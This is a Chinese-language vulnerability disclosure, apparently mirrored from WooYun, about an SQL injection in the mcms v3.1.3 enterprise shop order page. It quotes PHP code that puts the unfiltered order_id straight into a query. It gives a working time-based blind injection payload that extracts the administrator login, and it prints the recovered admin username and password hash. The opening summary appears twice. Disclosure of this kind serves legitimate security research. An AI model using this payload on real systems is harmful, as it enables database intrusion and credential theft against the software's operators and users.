VULHUB ™

### 简要描述： mcms最新版SQL注入漏洞（可出任意数据） ### 详细说明： 掌易科技的程序员反应相当快啊，确认漏洞当天就修复以后出新版本了，前面在wooyun提的几个漏洞新版的mcms做了相应的处理，发布了新版v_3.1.3.enterprise，再来研究研究。 注入一枚： GET /app/public/gov.shop.order.php?m=view&order_id=1（注意public文件夹是安装系统时取的名字）其中order_id没有过滤，直接进行sql执行。 ``` function m__view(){ global $dbm,$result,$V,$C,$order_id; check_level('GA0101',AJAX); $_GET['order_id'] = isset($_GET['order_id']) ? trim($_GET['order_id']) : ''; $sql="select * from ".TB_PRE."order_comment where order_id=".$_GET['order_id']; $rs = $dbm->query($sql); $result = get_order_info($_GET['order_id']); $result['order_comment'] = $rs['list']; $order_id = explode(',',$_GET['order_id']); //print_r($order_id); } ``` order_id没有过滤，直接进行sql执行 Payload:GET提交 ``` /app/public/gov.shop.order.php?m=view&order_id=0/**/or(select/**/if(ord(mid((select/**/login_name/**/from/**/mcms_user/**/limit/**/0,1),1,1))%3d108,sleep(1),0))%23 ``` 因为是time-based blind 注入，猜测管理员用户名的第一个字母时，若错误，不延迟，如下图 [<img...

### 简要描述： mcms最新版SQL注入漏洞（可出任意数据） ### 详细说明： 掌易科技的程序员反应相当快啊，确认漏洞当天就修复以后出新版本了，前面在wooyun提的几个漏洞新版的mcms做了相应的处理，发布了新版v_3.1.3.enterprise，再来研究研究。 注入一枚： GET /app/public/gov.shop.order.php?m=view&order_id=1（注意public文件夹是安装系统时取的名字）其中order_id没有过滤，直接进行sql执行。 ``` function m__view(){ global $dbm,$result,$V,$C,$order_id; check_level('GA0101',AJAX); $_GET['order_id'] = isset($_GET['order_id']) ? trim($_GET['order_id']) : ''; $sql="select * from ".TB_PRE."order_comment where order_id=".$_GET['order_id']; $rs = $dbm->query($sql); $result = get_order_info($_GET['order_id']); $result['order_comment'] = $rs['list']; $order_id = explode(',',$_GET['order_id']); //print_r($order_id); } ``` order_id没有过滤，直接进行sql执行 Payload:GET提交 ``` /app/public/gov.shop.order.php?m=view&order_id=0/**/or(select/**/if(ord(mid((select/**/login_name/**/from/**/mcms_user/**/limit/**/0,1),1,1))%3d108,sleep(1),0))%23 ``` 因为是time-based blind 注入，猜测管理员用户名的第一个字母时，若错误，不延迟，如下图 [<img src="https://images.seebug.org/upload/201504/11233925e7b27278507908eeab2a21f2569f97df.jpg" alt="错误副本.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/11233925e7b27278507908eeab2a21f2569f97df.jpg) 若正确，延迟，如下图 [<img src="https://images.seebug.org/upload/201504/1123393873df4e6032c3068ab6cfe5490be87e31.jpg" alt="成功副本.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/1123393873df4e6032c3068ab6cfe5490be87e31.jpg) 按上面的方法依次做下去（burp intruder或者自己写个脚本跑），可测试管理员用户名为：mcmsadmin，密码为： f6fdffe48c908deb0f4c3bd36c032e72 ### 漏洞证明： 见 详细说明